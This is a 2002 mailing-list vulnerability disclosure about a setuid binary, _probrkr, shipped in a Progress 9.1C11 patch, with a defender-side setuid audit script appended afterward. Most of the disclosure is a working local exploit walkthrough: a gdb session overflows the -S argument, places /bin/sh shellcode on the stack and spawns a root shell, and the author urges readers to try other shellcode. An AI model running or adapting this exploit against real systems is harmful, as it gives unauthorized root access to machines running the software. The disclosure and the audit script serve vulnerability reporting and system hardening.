Date: Wed, 01 May 2002 22:36:38 -0700
From: KF <[email protected]>
To: [email protected], [email protected],
Subject: latest Progress patch has suid issues AGAIN.
Due to a flat-out NO response, once again, to my offer to help Progress with their security issues, they have not been notified about this issue. If there are any people from the PEG reading, please clue your friends in... http://www.peg.com/usgrp.html
-KF
[Attachment: progress_notes.txt]
Progress 9.1C11 Patch date 2002/04/26
http://www.progress.com/patches/patchlst/91C-178v.htm
Once again, by ignoring my warnings and suggestions and even offers to audit code prior to release for the public, Progress Software has happened upon a security hole.
If you will recall from last month, Progress likes to GIVE you suids in their patches. Last month they GAVE us sqlcpp. Well, they decided that in this patch they would fix sqlcpp, as you can see here...
20020403-020 * utilities: sqlload, sqldump, sqlschema
Security Bug: A buffer overflow has been reported in the sqlcpp program included with Progress, used as a SQL preprocessor.
...and then be soooo generous as to GIVE you yet another suid binary, and yet ANOTHER security risk to worry about.
I can't say that this file was part of my last release... looks like fun though.
[root@ghetto bin]# ls -al _probrkr
-rwsrwxr-x 1 1089 110 268306 Apr 22 15:23 _probrkr
[root@ghetto bin]# ./_probrkr -S `perl -e 'print "A" x 100'`
01:19:15 (pid 32638) BROKER
Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
** Unable to create dataserv.lg, errno = 13 (609)
01:19:15 (pid 32638) BROKER
Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Unable to open or create dataserv.lg, error 13. (2257)
01:19:15 (pid 32638) BROKER
Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
** Unable to create ds_32638.lg, errno = 13 (609)
01:19:15 (pid 32638) BROKER
Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Unable to open or create ds_32638.lg, error 13. (2257)
01:19:15 (pid 32638) BROKER
Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Unable to open dataserver log file. (2683)
01:19:15 (pid 32637) BROKER
Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
** This process terminated with exit code 2. (8619)
Hrmm, let's try again.
(gdb) r -S `perl -e 'print "A" x 564'`
Starting program: /home/91c11/bin/./_probrkr -S `perl -e 'print "A" x 564'`
Program received signal SIGSEGV, Segmentation fault.
0x08071725 in stncop () at eval.c:41
41 eval.c: No such file or directory.
in eval.c
(gdb) bt
#0 0x08071725 in stncop () at eval.c:41
#1 0x080629e2 in dblgm () at eval.c:41
#2 0x20200a20 in ?? () at eval.c:41
Cannot access memory at address 0x41414141
That's usually not good. =]
(gdb) frame 2
#2 0x20200a20 in ?? () at eval.c:41
41 in eval.c
(gdb) i r
eax 0xbffff48b -1073744757
ecx 0xffffffed -19
edx 0x20202020 538976288
ebx 0x8079d28 134716712
esp 0xbffff1f0 0xbffff1f0
ebp 0x41414141 0x41414141
esi 0x2f 47
edi 0xbffff500 -1073744640
eip 0x20200a20 0x20200a20
(gdb) frame 3
Cannot access memory at address 0x41414141
That means it's owned for sure, I believe....
Drop some shellcode on the stack... do a lil ninja and voila.
(gdb) x/10s 0xbffffeba+10
0xbffffec4: "11۰\027\200\037^\211v\b1\210F\a\211F\f\013\211\215N\b\215V\f\2001\211@\200/bin/sh"
(gdb) r -S `perl -e 'print "\xc4\xfe\xff\xbf" x 150'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/91c11/bin/./_probrkr -S `perl -e 'print "\xc4\xfe\xff\xbf" x 150'`
01:02:59 (pid 1463) BROKER Service:
11۰̀^1FF
V
̀1ۉ@̀/bin/sh
Hrmm, that's hardly the output I was expecting... an associate of mine noted that you could tamper with the inputs of various functions. One thing you really need to note above is "01:02:59 (pid 1463)": something was spawned as a child process...
Check the pid 1463...
root 1463 1460 0 01:02 pts/0 00:00:00 /bin/sh
How nice, a shell spawned by the _probrkr parent id:
root 1460 1413 0 01:02 pts/0 00:00:00 /home/91c11/bin/./_probrkr -S
Do a quick strace on it...
[40057a01] --- SIGTTIN (Stopped (tty input)) ---
[400578ef] rt_sigaction(SIGTTIN, {SIG_IGN}, {SIG_DFL}, 8) = 0
[4010fac4] ioctl(255, 0x540f, [1460]) = 0
[400578ef] rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_IGN}, 8) = 0
[40057a01] kill(0, SIGTTIN) = 0
[40057a01] --- SIGTTIN (Stopped (tty input)) ---
If you strace that bash shell you can see that it is flipping out about not having a tty... Progress won't let us type in an interactive sh prompt, so use some other type of shellcode. Have fun.
-KF
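As an added, defender-side example that is not part of KF's mail and not Progress's code: the `ls -al` listing above shows `_probrkr` installed with mode `-rwsrwxr-x`, that is setuid and also group-writable, owned by a numeric uid (1089) with no matching account on the box. The check an administrator wants after applying a vendor patch like this one is an inventory of every setuid/setgid file the patch dropped into the install tree, with the writable ones flagged. The POSIX shell script below does that, assuming only `find`, `ls`, `awk` and standard utilities; the directory it audits is a constructed sample built in a temp dir, and the file names in it (`broker`, `loader`, `plain`) are placeholders, not Progress binaries.

```shell
#!/bin/sh
# Added example, not from KF's mail or from Progress: audit a directory tree
# for setuid/setgid files and flag those that are also group- or world-writable.
# The sample tree below is constructed for demonstration; its file names are
# placeholders, not Progress binaries.

# audit_suid DIR
# Prints one line per setuid/setgid regular file under DIR, sorted by path:
#   "<flags> <path>"  with flags S = setuid, G = setgid, W = group/world-writable
audit_suid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print | sort |
    while IFS= read -r f; do
        flags=""
        [ -u "$f" ] && flags="${flags}S"
        [ -g "$f" ] && flags="${flags}G"
        # Read the mode string the way ls -al shows it, e.g. -rwsrwxr-x;
        # column 6 is the group write bit, column 9 the other write bit.
        mode=$(ls -ld "$f" | cut -c1-10)
        case "$mode" in
            ?????w???? | ????????w?) flags="${flags}W" ;;
        esac
        printf '%s %s\n' "$flags" "$f"
    done
}

# count_writable_suid DIR
# Number of setuid/setgid files under DIR that are also group/world-writable;
# anything other than 0 means a non-owner can replace a privileged binary.
count_writable_suid() {
    audit_suid "$1" | awk '$1 ~ /W/ { n++ } END { print n + 0 }'
}

# make_sample_tree
# Builds a constructed bin/ directory: one file with the same mode as
# _probrkr in the listing above (4775: setuid + group-writable), one setuid
# but not writable (4755), and one ordinary 0755 file. Prints the temp dir.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir "$d/bin"
    for name in broker loader plain; do
        printf '#!/bin/sh\nexit 0\n' > "$d/bin/$name"
    done
    chmod 4775 "$d/bin/broker"
    chmod 4755 "$d/bin/loader"
    chmod 0755 "$d/bin/plain"
    printf '%s\n' "$d"
}

# Demonstration on the constructed tree. Real use: audit_suid /path/to/dlc/bin
SAMPLE=$(make_sample_tree)
audit_suid "$SAMPLE"
echo "setuid/setgid files that are also writable: $(count_writable_suid "$SAMPLE")"
rm -rf "$SAMPLE"
```

Run it against the vendor's `bin` directory before and after a patch and diff the two listings; a new `S` line is a new privileged binary to review, and any `W` line is a file whose owner is not the only one who can change what runs with those privileges.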